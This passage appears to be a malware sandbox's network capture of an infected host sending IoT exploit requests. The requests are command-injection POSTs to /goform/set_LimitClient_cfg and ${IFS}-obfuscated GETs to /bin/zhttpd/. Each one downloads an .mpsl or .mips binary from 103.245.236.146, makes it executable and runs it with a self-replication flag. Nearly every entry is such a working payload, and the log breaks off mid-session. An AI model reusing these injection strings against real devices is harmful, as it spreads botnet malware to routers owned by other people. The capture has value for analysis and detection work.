6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20
                                                Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3392192.168.2.2344026104.24.24.248080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.154248953 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:21.272423029 CET328INHTTP/1.1 400 Bad Request
                                                Server: cloudflare
                                                Date: Sun, 28 Jan 2024 09:16:21 GMT
                                                Content-Type: text/html
                                                Content-Length: 155
                                                Connection: close
                                                CF-RAY: -
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3393192.168.2.2346012110.80.148.498080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.238368988 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:21.587497950 CET479INHTTP/1.1 400 Bad Request
                                                Server: kngx/1.10.2
                                                Date: Sun, 28 Jan 2024 09:16:21 GMT
                                                Content-Type: text/html
                                                Content-Length: 172
                                                Connection: close
                                                KS-Deny-Reason: client|81.181.57.74|cdnfzct41-cache03.cdnfzct41.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                x-link-via: fzct41:8080;
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3394192.168.2.2346016110.80.148.498080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.241173983 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:21.579576969 CET479INHTTP/1.1 400 Bad Request
                                                Server: kngx/1.10.2
                                                Date: Sun, 28 Jan 2024 09:16:21 GMT
                                                Content-Type: text/html
                                                Content-Length: 172
                                                Connection: close
                                                KS-Deny-Reason: client|81.181.57.74|cdnfzct41-cache07.cdnfzct41.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                x-link-via: fzct41:8080;
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3395192.168.2.2346554115.18.43.28080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.537185907 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:21.833177090 CET103INHTTP/1.1 404 Not Found
                                                Content-Type: text/plain
                                                Content-Length: 30
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3396192.168.2.234385098.94.165.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756313086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3397192.168.2.2333170159.208.187.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756330967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3398192.168.2.2344024174.225.73.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756345987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3399192.168.2.235075652.226.105.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756371021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3400192.168.2.234737640.20.144.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756392002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3401192.168.2.2336304123.75.201.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756423950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3402192.168.2.234864074.200.181.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756442070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3403192.168.2.23426641.76.18.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756458044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3404192.168.2.2360318204.202.15.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756484032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3405192.168.2.2342054179.177.12.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756513119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3406192.168.2.234392641.244.237.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756556034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3407192.168.2.23591781.229.146.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756556988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3408192.168.2.2348020124.214.232.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756577015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3409192.168.2.2335344147.200.19.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756602049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3410192.168.2.2341632208.120.203.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756612062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3411192.168.2.2333150124.23.11.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756653070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3412192.168.2.2342090175.235.165.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756680965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3413192.168.2.234498261.149.124.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756689072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3414192.168.2.2354286121.144.176.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756742954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3415192.168.2.2353564155.97.130.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756745100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3416192.168.2.23501541.158.209.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756767035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3417192.168.2.233333671.120.98.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756792068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3418192.168.2.235772443.123.69.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756846905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3419192.168.2.2342178221.136.59.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756885052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3420192.168.2.2333524174.60.211.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756906033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3421192.168.2.235032446.140.118.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756915092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3422192.168.2.2347174195.200.128.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756936073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3423192.168.2.2348420140.19.41.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.756967068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3424192.168.2.234056498.58.237.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757004023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3425192.168.2.2345220159.144.66.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757009029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3426192.168.2.2350896125.177.203.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757035017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3427192.168.2.234360667.16.83.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757045031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3428192.168.2.2335334182.32.224.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757071972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3429192.168.2.2334960184.227.234.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.757126093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3430192.168.2.2353126192.109.215.121443
